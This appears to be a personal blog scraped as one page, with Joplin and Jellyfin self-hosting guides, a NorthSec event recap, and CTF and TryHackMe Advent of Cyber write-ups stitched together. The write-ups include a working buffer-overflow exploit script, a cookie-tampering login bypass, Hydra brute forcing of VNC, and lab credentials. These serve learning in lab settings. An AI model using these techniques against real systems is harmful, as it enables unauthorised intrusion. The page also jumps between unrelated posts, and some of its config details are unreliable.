Thanks to the docker compose sample file as well as this and this video from DB Tech, I was able to setup my Joplin Server on Portainer

Here is the official Joplin server guide

I used the sample docker compose file mentioned earlier and modified it to my preferences. Change all fields that use a place holder name prefacing with $. Note that the ${APP_BASE_URL} requires you to include http or https depending on which protocol you’re using.

version: '3'

services:
    db:
        image: postgres:15
        volumes:
            - ./docker/joplin/db:/var/lib/postgresql/data
        ports:
            - "5432:5432"
        restart: unless-stopped
        environment:
            - POSTGRES_PASSWORD=${POSTGRES_PASSWORD}
            - POSTGRES_USER=${POSTGRES_USER}
            - POSTGRES_DB=${POSTGRES_DATABASE}
    app:
        image: joplin/server:latest
        depends_on:
            - db
        ports:
            - "22300:22300"
        restart: unless-stopped
        environment:
            - APP_PORT=22300
            - APP_BASE_URL=${APP_BASE_URL}
            - DB_CLIENT=pg
            - POSTGRES_PASSWORD=${POSTGRES_PASSWORD}
            - POSTGRES_DATABASE=${POSTGRES_DATABASE}
            - POSTGRES_USER=${POSTGRES_USER}
            - POSTGRES_PORT=5432
            - POSTGRES_HOST=db

Instead of using a reverse proxy, I used Cloudflare’s Zero Trust tunneling access to make it easier. Create an account and add your payment info after selecting the free plan.

1. Log into your domain registrar
2. Remove current nameservers
3. Add Cloudflare’s provided nameservers
4. Go to Cloudflare Zero Trust dashboard
5. Click Access, then tunnels
6. Create a tunnel
7. Give it a name
8. Install a connector, click on Docker
9. Copy the given command that looks like this:

• Note that I added the -d flag so that it runs in the background of your terminal

docker run -d cloudflare/cloudflared:latest tunnel --no-autoupdate run --token $token

10. Fill in the fields for the public hostname for your chosen domain
    1. For the URL, write the internal IP with the port, for example: http://192.168.0.101:22300

Once the tunnel is successfully created, you should be able to access your Joplin instance from the internet!

Configuring Admin Page

Following the official guide we access our instance and login using the given credentials:

username: admin@localhost
password: admin

Now that you’ve logged in, go and change the credentials to something genuinely secure. If you’re like me and did not configure the email setup, when you get the confirmation email you can actually see the email by going into the Admin panel and selecting Emails where you will see the email. From here you can retrieve the verificaiton link.

Now we follow the instructions written on the Joplin home page of our login to setup our connection to the server. The only thing to mention is that the self hosting option is a bit hidden in smaller print when you’re selecting the Synchronize button. Make sure to select that option and not the Joplin Cloud/Dropbox/OneDrive options.

Now you’re setup! I would suggest to checkout the End-to-End Encryption docs for enabling E2EE. It is a great way to improve your note security. Just note that if you plan to share a notebook with E2EE enabled (for both you and your partner), you will need your partners decryption key and you will need to share your encryption key.

Issues that I encountered

With the the containers for the database and the app running just fine, I had the following error from the database container:

2023-08-01 06:58:21.839 UTC [1] LOG:  database system is ready to accept connections
2023-08-01 06:58:22.617 UTC [70] ERROR:  relation "knex_migrations" does not exist at character 20
2023-08-01 06:58:22.617 UTC [70] STATEMENT:  select "name" from "knex_migrations" order by "id" desc limit $1

From there the app returns the following error:

2023-08-01 07:01:21: [error] App: 404: GET /: ::ffff:192.168.0.108: Invalid origin: http://192.168.0.102:22300
2023-08-01 07:01:21: App: GET / (404) (5ms)

After speaking with some friends and reaching out to the community, I realized that the cause for this was when I set the scheme to HTTPS instead of HTTP in my Cloudflare tunnel. Once I changed that setting I was able to access the Joplin server.

Docker

You can use docker compose or simply deploy the app through Portainer’s UI without docker compose. Replace any $ variable with your setting. Here are the settings that I used for my docker setup:

image: linuxserver/jellyfin:latest
ports:
	- 1900:1900 # tcp
	- 8086:8086 # tcp
	- 7359:7359 # udp
	
volumes:
	- ./media/tv:/data/TV
	- ./media/videos:/data/Videos
	- ./media/movies:/data/movies
	- ./media/music:/data/music
	- ./docker/jellyfin/config:/config
	
environment:
	- PUID=${PUID}
	- PGID=${PGID}
	- TZ=America/Toronto
	
restart-policy=unless-stopped

I do plan to look at using reverse proxies in the future so I may access my content from outside of my local network but that will be done at a later date. When I get it running I will update this blog post and mark it with an update timestamp.

Regardless of how I felt about the education itself, the friends and networks that I created was certainly the most valuable part of the journey. The openess of the students and the community created out of a shared struggle to succeed played a huge role in helping me to learn and understand abstract and difficult material, no matter how it was presented.

A huge thank you to the support network that kept me going for those 4 long years. My girlfriend was my pillar to lean on, my friends were my teacher when I could not understand, my family was my cheerleaders. I certainly could not have gotten through this without all of you.

I hope that someday I can return the same level of support that you guys have done and continue to do for me.

Based on the information given, we have to tinker with the image posted:

Let’s first check if there are embedded files within the image using the following command:

$ binwalk myself-avatar.jpg

Okay so there’s a zip file hidden, let’s extract it using the following command:

$ binwalk --dd='.*' myself-avatar.jpg

We now have the following zip file, it is password protected. From here we could attempt to brute force it with a tool but I was lucky and guessed the correct password to be password.

Inside the folder called myself we see a bunch of cat images and an interesting file called myself.txt

We extract the flag from this file:

FLAG-43e1f21fd2741b2266eaf9c6cf93b46f62b73d7d9df0fa1e98611e6f64200815

Here was my favorite image:

This year was my first ever attendance to the North Sec cyber security event. It is Canada’s largest cyber security event, consisting of 3 parts: the conference, competition (CTF) and trainings, spanning nearly a week. Depending on which package you buy, you will be given various ‘swag’ and other items for the various events. In my case, I bought the early bird conference and competition combo since I was still a student at the time (students got a 50% off promotion code) and wanted to do some networking. This year was North Sec’s 10th anniversary so it was filled with tons of cool stuff.

Conference

This years conference was 2 days (May 18th & 19) and had many great speakers giving some fascinating talks. Here were my personal favorites:

• Deception for pentesters by Laurent Desaulniers
• Q&A Red Team by Charles F. Hamilton, Laurent Desaulniers, Martin Dube and Guillaume Caillé
• Abusing GitHub for fun and profit: Actions and Codespaces Security by Magno Logan
• Behind the Scenes in GitHub Bug Bounty by Logan MacLaren

The badge for accessing the conference really surprised me, I definitely did not expect to have such an intrecate pieace of hardware. Take a look:

Notice the small mushroom with an LED on it? Well in the community village, there was a soldering area and I was lucky enough to go when it was quiet, near the end of the second day and got to learn beginner skills for soldering. The badge had many challenges which unlocked levels which was really cool, though I didn’t participate in them so much since I attended many talks.

Competition

The talks ended Friday evening around 17:00 and the CTF started at 20:00. I had the priviledge and pleasure to join cubermitis, a group of highly motivated and skilled CTF-erss for this event. We started off quite strong, holding within the top 10 position for the first 24 hours:

By the end of the event, we managed to secure 18th place on the leaderboard with 98 points, out of 76 total teams.

> askgod scoreboard                                  
        TEAM       | POINTS |   LAST SUBMIT     
-------------------+--------+-------------------
  <CA> Cubermitis  |     98 | 2023/05/21 14:57 

Overall, despite being quite new to the CTF scene and finding difficulty with many of the higher level challenges this year, I was proud that I managed to get a few challenges solved while helping out my teammates. The experience I got from the CTF was invaluable and well worth while, I learned a ton while having a great time. I will definitely attend following North Sec events.

They announced the winners in their Discord server on the announcements channel.

This was a big win for me since it was my first time attempting the writeups officially. I hope to bring more writeups in the future and furhter improve my skills to transfer the knowledge that I’ve gained through my experiences with this challenges.

Solution

I would like to preface this, that I have done this exact challenge from PicoCTF 2022, called buffer overflow 1 and at the time I followed along with John Hammond’s solution video. As a result, when I saw this challenge, I immediately recognized it and thus I used the solution developed by John Hammond, and simply modified it for this challenges specifics. Nonetheless I will demonstrate the knowledge I gained at the time and share it on this writeup, but I will give credit where its due, so thanks John!

Now on to how I retrieved the flag!

First we look at the chall.c file and notice immediately the gets function. A known vulnerable C function that is susceptible to buffer overflows. Furthermore, there’s an uncalled win function which will print out the flag. Now we want to overflow the gets function such that we can retrieve the flag through the uncalled win function.

How do we overflow the gets function? Well you need to pass in enough input until you can begin to control where you end up in memory. But we will need to know where in memory we want to go. How is this done? Using readelf I could find out where in memory the win function was loaded. Note that the -s is for symbols.

readelf -s chall

We see on our test machine that the win function is located in the following address: 0x08048486

Now we just need to pass in enough values until we can manipulate the memory address. I achived this by passing in an obnoxious amount of A’s to the program until I got a seg fault. I did this in chunks of 4 A’s at a time. Eventually I realized that adding 12 characters to the input string originally made to be size of 56 caused a segfault.

Checking with

sudo dmesg

We can see where the instruction pointer (ip) is pointing when it seg faults. Let’s add 1 more character to the string, like A we see where we end up with the tool. Using dmesg we see that theres a seg fault at an address ending in 0x41, which should look familiar as 0x41 is the hex value of A. Testing it with B we see it ending with 0x42. Now we know we can manipulate the memory to get to the win function.

Since we want to end up in 0x08048486, we will have to understand how memory works a little more. The concept of Endianness is important here. John does a great explanation about it here. But to summarize, essentially we need to take chunks of bytes (pairs of 2 in this case) and ‘invert’ it so to speak. These bytes are stored in memory using Little Endian encoding. Take a look below:

We want to change this address into Little Endian:
0x08048486

Grab the first 2 'characters' and put them at the end, then grab the next 2 'characters' and put them in the second to last place, and so on:
0x86840408

Here is how we will represent the bytes in Python:
\x86\x84\x04\x08

We check the conversion to bytes using the following command:

python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08')" | xxd

Testing with the local function:

python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08')" | ./chall

Lets write up a quick Python script, here is the direct download:

#!/usr/bin/env python3

import socket # dealing with internet connections
import argparse # pass arguments when calling the script so we can use it for any other CTF challenges
import struct # for changing the memory address into Little Endian.

# Build out the arg parser and args to take in
parser = argparse.ArgumentParser()
parser.add_argument(
    "host",
    type=str,
    help="The hostname or IP address to connect to"
)
parser.add_argument(
    "port",
    type=int,
    help="The port for the service to connect to"
)

args = parser.parse_args()

# for testing
print(args.host, args.port)

# Swaps the memory address to Little Endian for us
ip = struct.pack("<I", 0x08048486)

# 69 here represents the offset + 1
payload = b"".join(
    [
        b"A" * 69,
        ip
    ]
)
# Add the bytes for a newline to mimick pressing the "Enter" key
payload += b"\n"

# Takes care of closing the socket
with socket.socket() as conn:
    conn.connect((args.host, args.port))
    # print(conn.recv(4096).decode("utf-8"))
    conn.send(payload)
    print(conn.recv(4096).decode("utf-8"))

Running the script, we get the following response from the server:

magpie{0mn1_fl4g_3v3rywh3r3}

Solution

Opening the C file, we see that the file does not have the typical gets function that is well known for its vulnerabilities. Instead the function we have to focus on it scanf. If you aren’t aware, scanf does not have bound checking capability so if the input string is longer than the buffer size, then it will overflow.

Let’s test that out by making a quick test flag.txt in the same directory as the Code executable. Now we will pass some arbirtuary input like:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We see the output below:

The flag is:

magpie{5c4nf_n07_54f3}

Solution

First we open the file in Wireshark.

Since the amount of web traffic is very small we can just analyze it manually. Notice the HTTP GET request for /Password.PNG in frame 4. After nearly 10 ACKs and PSHs, we get our server response code 200, HTTP OK in frame 15. Note, alternatively you could filter through the HTTP protocol just to see the HTTP traffic.

Opening frame 15 we enter the HTTP layer and expand the fields until we see the Portable Network Graphics field. Right click and export the packet bytes and give it a name.png.

Opening the image we see the flag:

magpie{wh3r3_15_7h3_p455w0rd}

Solution

Default websites often have a login/admin.html/php web page for admin users to login and modify certain elements. Using this information we can quickly test it, it never hurts to try right? As such we find that http://srv1.2023.magpiectf.ca:1234/admin.html exists.

Note, you could have alternatively seen within the robots.txt that it disallows the traversal/crawling of /admin.html or you could have seen the invisible link within the nav bar.

We navigate to the portal and try admin:admin for the credentials to see if the most basic username and password was set. Alas we have to dig deeper. Going into the browser dev tools we see that a script.js is run to check on the login POST form. Luckily, double clicking the script allows us to see the Javascript file so we can see how the login is validated.

Notice how the only parameter tha matters is the following:

form.addEventListener('submit', (e) => {
    e.preventDefault();
    let username = document.getElementById('username').value;
    if (document.cookie === '') {
        document.cookie = "admin=false";
        document.cookie = `user=${username}`;
        window.location = "denied.html" // Redirect
    }
    else {
        let admin = getCookie("admin");
        if (admin === "true") {
            window.location = "panel.html"; // Redirect
        }
        else {
            window.location = "denied.html" // Redirect
        }
    }
});

We can see that if we are able to modify the cookie key value pair of admin=false to admin=true then we can submit anything within the form and allowed to login. Going to the console and typing:

document.cookie="admin=true"

Refresh the page, and pass in random credentials and we are in!

magpie{bu7-7h3-m1Lk-ju57-fl04T5-4W4y!}

Solution

In our terminal of choice, using the following command:

strings challenge.png

We can see in the output that the challengers offered a hint: Have you heard of stegsolve? My answer: nope.

A quick search for stegsolve leads me to this GitHub repo containing a stegsolve tool.

We install the stegsolver tool on my virtual machine and ran the imagine combiner tool under the analyse tab to retrieve the flag:

magpieCTF{H0p3fully_U_D1dnt_Brut3_f0rc3_1t}

As the rules prohibited players from asking third parties for solutions or methods of attack, I was left only with the power of browsing the web in research so I can learn of different methods to solve the challenges. But I’ve never been one to back down from a challenge so I steamrolled ahead.

I will be posting my writeups for each challenge that I solved successfully, and noted. Unfortunately I was unable to see my final rank since I had to leave a few hours before the CTF ended but overall it was a good experience. I learned how important it is to have a team that can communicate effectively and have a variety of skillsets which would allow for an easier time with the challenges.

For those interested, below is the category breakdown:

I did better than expected considering this was my first CTF that I’ve partaken live; I had some experience with picoCTF. I placed 21st overall with 808 points total.

In total, I had 15 number of solves. I just managed to get at least 1 solve in each category. I’m hoping to improve significantly in my upcoming CTFs. Ideally I would like to get good with reverse engineering but that is a steep slope. It’ll take a lot of work but I’m sure it will pay off in the end.

If you’re interested in finding CTFs, CTF time is the best resource that I found. Below is a couple of upcoming CTFs that I’ve signed up for.

I did in fact complete the entire challenge as seen here. I was running out of time since I was still doing final exams and once I finished that, it was time to spend the holidays with friends and family. I don’t think I will finish the writeups since I feel overwhelmed with the amount left.

I will likely do a few writeups for the ISSessions 2023 CTF.

I plan to update this relatively frequently, especially as I begin to attend more CTFs and for my own personal development. I think this site can help me grow as a computer scientist who loves all things tech & cyber security.

Puzzle #1

Clues:

1. Research is part of my ask, finding clues in public sources.
2. Simple documents I turn into malware.
3. A pizza, parcel or payload all have me as an action in common.
4. A con is the name of my game, tricking you into believing a false identity.
5. Weaknesses are my go-to resources; through them, I make my presence felt.
6. I am set up to let you back into the network after you leave.
7. Deletion of evidence is part of my process.
8. Communication with the compromised goes through me.

Solution

Puzzle #2

Clues:

1. I am an anchor that lets you go on an adventure and explore.
2. With me, you can locate new information to expand the attack.
3. Once a pawn, I became a King.
4. My payloads are triggered to infect all they come in contact with.
5. Passwords I collect are the keys to the mainframe.
6. Side to side, machine to machine, we hop.

Solution

Puzzle #3

Clues:

1. In your vault, I am in.
2. Like a dragon, I gather all valuable loot.
3. I export gathered treasures.
4. With me, your reputation goes tumbling down.
5. Goals set, goals attained. I win!

Solution

Who is the adversary that attacked Santa’s network this year?

Answer:

The Bandit Yeti!

What’s the flag that they left behind?

Answer:

THM{IT'S A Y3T1 CHR1$TMA$}

Authors

• Shanks

Learning Objectives

In today’s task, you will:

• Learn what log files are and why they’re useful
• Understand what valuable information log files can contain
• Understand some common locations these logs file can be found
• Use some basic Linux commands to start analysing log files for valuable information
• Help Elf McBlue track down the Bandit Yeti APT!

Use the ls command to list the files present in the current directory. How many log files are present?

Make sure your current working directory is /home/elfmcblue. If you do not know, run this command: pwd

Count the number of files that are output to the terminal.

$ ls
SSHD.log webserver.log

Answer:

2

Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?

Make sure your current working directory is /home/elfmcblue. If you do not know, run this command: pwd

We are looking for a webserver log file, conveniently, we notice webserver.log exists within the /home/elfmcblue directory.

$ ls
SSHD.log webserver.log

Answer:

webserrver.log

On what day was Santa’s naughty and nice list stolen?

Our first attempt with grep. We chose the -i option because we aren’t sure how the word stolen will be written in the log files. Furthermore since we are interested in the webserver logs, we will grep through that file. We notice that the date is November 18th. Checking our calendar, that leads us to the answer. Another possible way to arrive to this conclusion is

$ grep -i "stolen" webserver.log
10.10.249.191 - - [18/Nov/2022:12:35:23 +0000] "GET /ReceivingStolenGoodsOnline HTTP/1.1" 404 437 "-" "gobuster/3.O.1"
10.10.249.191 - - [18/Nov/2022:12:35:24 +0000] "GET /011003-new_uk_database_mkes_stolen_pho HTTP/1.1" 404 437 "-" "gobuster/3.O.1"
10.10.249.191 - - [18/Nov/2022:12:35:27 +0000] "GET /alone_on_preikestoten HTTP/1.1" 404 437 "-" "gobuster/3.O.1"
10.10.249.191 - - [18/Nov/2022:12:35:27 +0000] "GET /stolen_pc_holds_1 HTTP/1.1" 404 437 "-" "gobuster/3.O.1"

Answer:

Friday

What is the IP address of the attacker?

In the output of the above grep command, we notice that the IP address is shown in the logs. This IP address is particularly persistent in its requests to the webserver. Therefore we can infer that the IP address making these requests is from the attacker.

Answer:

10.10.249.191

What is the name of the important list that the attacker stole from Santa?

Knowing that the file we are looking for is a list, we can infer that the most likely name format of this list would be something_list.txt or someList.txt. It is common practice to use a easily readable file format like .txt extension. Therefore we use -i to ignore the case in the event that the list is written in snake case or camel case. We could have used the -r option instead of specifying the webserver.log file in case there were more than 2 files in the current working directory. However, it was most likely going to be logged within the webserver.log file so we chose that option instead.

$ grep -i "list.txt" webserver.log
10.10.249.191 - - [18/Nov/2022:12:34:39 +0000] "GET /santaslist.txt HTTP/1.1" 200 133872 "-" "Wget/1.19.4 (linux-gnu)"

Answer:

santaslist.txt

Look through the log files for the flag. The format of the flag is: THM

Using the -r option, we recursively iterate through all of the files within the current working directory (pwd) and search for the beginning portion of the flag format that consistantly remains the same: "THM{".

$ grep -r "THM{"
SSHD.log:THM{STOLENSANTASLIST}

Answer:

THM{STOLENSANTASLIST}

Authors

• Shanks

Learning Objectives

• What is OSINT, and what techniques can extract useful information against a website or target?
• Using dorks to find specific information on the Google search engine
• Extracting hidden directories through the Robots.txt file
• Domain owner information through WHOIS lookup
• Searching data from hacked databases
• Acquiring sensitive information from publicly available GitHub repositories

What is the name of the Registrar for the domain santagift.shop?

By going to the WHOIS lookup website, we enter either of the provided domains: santagift.shop or qa.santagift.shop and you will see that the Registar name is NameCheap Inc.

Answer:

NAMECHEAP INC

Find the website’s source code (repository) on github.com and open the file containing sensitive credentials. Can you find the flag?

Reading through the Github’s README, leads you to the config.php file which is where you will find the flag on line 2. Answer:

{THM_OSINT_WORKS}

What is the name of the file containing passwords?

Coincidentally, the same config.php file from above also contains the passwords.

Answer:

config.php

What is the name of the QA server associated with the website?

The answer can be deduced either from the README, where they mention the 2 main domains: santagift.shop or qa.santagift.shop, which you can use deductive reasoning. In addition if you checkout the config.php you will see on line 20, a comment that states:

Incase of QA, it will be qa.santagift.shop

Thus we have found the answer.

Answer:

qa.santagift.shop

What is the DB_PASSWORD that is being reused between the QA and PROD environments?

Within the config.php file we can use ctrl+f to find the DB_PASSWORD for both the QA and PROD environments. You will see the answer on line 31.

Answer:

S@nta2022

Authors

• Shanks

Learning Objectives

• What is Scanning?
• Scanning types
• Scanning techniques
• Scanning tools

What is the name of the HTTP server running on the remote host?

To figure out the name of the HTTP server running on the remote host, we will use the nmap tool. The command that we are interested in is nmap -sV MACHINE_IP which will return a list of running services on a live host. See output below:

user@hostName:~$ nmap -sV MACHINE_IP
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-04 20:12 EST
Nmap scan report for MACHINE_IP
Host is up (0.099s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: IP-MACHINE_IP; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Answer:

Apache

What is the name of the service running on port 22 on the QA server?

To determine the name of the service that we are interested in we can observe the output from the above question and we notice that the service running on port 22 is ssh:

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

Answer:

ssh

What flag can you find after successfully accessing the Samba service?

To retrieve the flag can be accomplshed in a variety of different ways. I attempted to access the Samba share through the terminal however I could not gain access to the folder of interest. Therefore I went through THM’s AttackBox to accomplish the next 2 tasks.

1. Open the file explorer on the AttackBox
2. Enter smb://MACHINE_IP in the address/path bar, next to Location:
3. Select Registered User
4. Enter the following credentials (we left the domain as is):

username: ubuntu
password: S@nta2022

5. Click connect
6. Navigate to the admins folder
7. Open flag.txt to retrieve the flag

Answer:

{THM_SANTA_SMB_SERVER}

What is the password for the username santahr?

From within the admins folder that we accessed in the above question, open the userlist.txt and retrieve the password from the user santahr.

Answer:

santa25

Authors

• Shanks

Learning Objectives

• Learn about common remote access services.
• Recognize a listening VNC port in a port scan.
• Use a tool to find the VNC server’s password.
• Connect to the VNC server using a VNC client.

Use Hydra to find the VNC password of the target with IP address MACHINE_IP. What is the password?

Before we begin using Hydra, we can use nmap to see that there is a vnc service running on our target machine:

user@hostName:~$ sudo nmap -sS MACHINE_IP
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-05 20:45 EST
Nmap scan report for MACHINE_IP
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5900/tcp open  vnc

Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

Now onward to using hydra. For this we don’t pass any username (-l option) but we will be using the popular rockyou.txt file which contains the worlds most common passwords. We will accomplish the task using the following command:

user@hostName:~$ hydra -P /path/to/rockyou.txt MACHINE_IP vnc

Below is the output from using the above command in the AttackBox:

We notice that after some time, hydra does in fact find the password to the vnc server via brute-force.

Answer:

1q2w3e4r

Using a VNC client on the AttackBox, connect to the target of IP address MACHINE_IP. What is the flag written on the target’s screen?

To retrieve the flag, you need an RDP client that supports the VNC protocol to access the machine. I used the included Remmina client within the AttackBox to gain access to the target machine. To log into the device you can follow THM’s steps or read them below:

1. Launch Remmina

2. Close the Unlock Login Keyring dialog box if it appears.

3. Change the protocol to VNC.
4. Enter the IP Address of the target system.

5. The wallpaper of the system contains the flag

Answer:

THM{I_SEE_YOUR_SCREEN}

Authors

• Shanks

Learning Objectives

• Learn what email analysis is and why it still matters.
• Learn the email header sections.
• Learn the essential questions to ask in email analysis.
• Learn how to use email header sections to evaluate an email.
• Learn to use additional tools to discover email attachments and conduct further analysis.
• Help the Elf team investigate the suspicious email received.

What is the email address of the sender?

Following the guide that TryHackMe showed us, we use the given command after we cd into the Desktop directory:

$ emlAnalyzer -i Urgent\:.eml --header --html -u --text --extract-all

Looking at the output of the emlAnalyzer command under the Header section we see:

Answer:

chief.elf@santaclaus.thm

What is the return address?

Looking at the output of the emlAnalyzer command under the Header section we see:

Answer:

murphy.evident@bandityeti.thm

On whose behalf was the email sent?

Looking at the output of the emlAnalyzer command under the Header section we see:

Answer:

Chief Elf

What is the X-spam score?

Looking at the output of the emlAnalyzer command under the Header section we see:

Answer:

3

What is hidden in the value of the Message-ID field?

Looking at the output of the emlAnalyzer command under the Header section we see:

Now we notice that the Message-Id is written in Base64 [you can tell by the length of the ID and the hexadecimal values given], from here we use a base64 decoder of our choosing. I google base64 decoder and here was the first link that I got. Now we only insert this: QW9DMjAyMl9FbWFpbF9BbmFseXNpcw== portion of the ID since the <> characters simply indicate the beginning and end of the ID. The answer is the output from the base64 decoder.

Answer:

AoC2022_Email_Analysis

Visit the email reputation check website provided in the task. What is the reputation result of the sender’s email address?

We visit the Email Reputation Analyzer from the guide and enter the senders email: murphy.evident@bandityeti.thm

We see that the email is flagged as risky.

Answer:

risky

Check the attachments. What is the filename of the attachment?

From the original emlAnalyzer command that we ran earlier, we can see in our Desktop folder that a new folder named eml-attachments has appeared after completing. From the terminal, we shall cd into that directory and look for the attachment name. Notice that if you attempt to open it that we get an error. The VM is hinting that the file may not be what it seems based on the error output.

Answer:

Division _ of _ labour-Load_share_plan.doc

What is the hash value of the attachment?

Now we will use the sha256sum to calculate the file’s hash value. Below is the output of that command.

$ sha256sum Division _ of _ labour-Load_share_plan.doc
0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467

Answer:

0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467

Visit the Virus Total website and use the hash value to search. Navigate to the behaviour section. What is the second tactic marked in the Mitre ATT&CK section?

Following the instructions, we head over to Virus Total, click Search and paste the hash that we found above: 0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467. After navigating to the behaviour section we find the second tactic as seen below:

Answer:

Defense Evasion

Visit the InQuest website and use the hash value to search. What is the subcategory of the file?

Now we visit InQuest and pass the hash value [0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467] into the INDICATOR LOOKUP. Click on view full details and we see the subcategory below:

Answer:

macro_hunter

Authors

• Shanks

Learning Objectives

• What is CyberChef
• What are the capabilities of CyberChef
• How to leverage CyberChef to analyze a malicious document
• How to deobfuscate, filter and parse the data

What is the version of CyberChef found in the attached VM?

Reading the VMs file path in the browser we see the version displayed.

Answer:

9.49.0

How many recipes were used to extract URLs from the malicious doc?

For the subsequent questions, all of them can be answered simply by following THM’s CyberChef instructions. For this question, simply count the number of recipes under the Recipe panel.

Answer:

10

We found a URL that was downloading a suspicious file; what is the name of that malware?

Looking at the list of urls from our defang step we see:

Grab that malicious file name and submit!

Answer:

mysterygift.exe

What is the last defanged URL of the bandityeti domain found in the last step?

Looking at the last url from our defang step we see:

Answer:

hxxps[://]cdn.[.]bandityeti[.]thm/files/index/

What is the ticket found in one of the domains? (Format: Domain/<GOLDEN_FLAG>)

Answer:

THM_MYSTERY_FLAG

Authors

• Shanks

Downloadable files

These are the included files to complete the day-8 task.

Learning Objectives

• Explain what smart contracts are, how they relate to the blockchain, and why they are important.
• Understand how contracts are related, what they are built upon, and standard core functions.
• Understand and exploit a common smart contract vulnerability.

What flag is found after attacking the provided EtherStore Contract?

Preface: This is not my area of expertise, in fact blockchain technology is where my cyber security skills are the weakest so this challenge took me longer than I’d like to admit. However, by reading through the instructions several times I was able to retrieve the flag successfully.

As for the method to retrieve the flag, follow the instructions until you get to Step 4. From here it feels vague but all that needs to be done is put a value [preferably small since it will consume a lot of memory otherwise, for reference I used 1], and select the Attack contract.

From there you scroll down to Deployed Contracts and click attack and wait for the console.log to return the flag.

Answer:

flag{411_ur_37h_15_m1n3}

Authors

• Shanks

Welcome to the annual event of tryhackme’s Advent of Cyber for 2022! This repo contains all of the solutions completed by myself for the purpose of self-learning and educating others that may stumble upon this repo. Each folder will contain the day’s task(s) and solutions as well as any software/programs/scripts that I may create. Enjoy!

Authors

• Shanks

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

License

This project is licensed under the MIT license.

These are the included files to complete the day-8 task.

Day 9 of tryhackme’s Advent of Cyber for 2022! This challenge involves learning about

Learning Objectives

Answer:

Authors

• Shanks

Day 10 of tryhackme’s Advent of Cyber for 2022! This challenge involves learning about

Learning Objectives

Answer:

Authors

• Shanks

Day 11 of tryhackme’s Advent of Cyber for 2022! This challenge involves learning about

Learning Objectives

Answer:

Authors

• Shanks

Day 12 of tryhackme’s Advent of Cyber for 2022! This challenge involves learning about

Learning Objectives

Answer:

Authors

• Shanks

Copyright (c) [2022] [Shanks]

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Day # of tryhackme’s Advent of Cyber for 2022! This challenge involves learning about

Learning Objectives

Answer:

Authors

• Shanks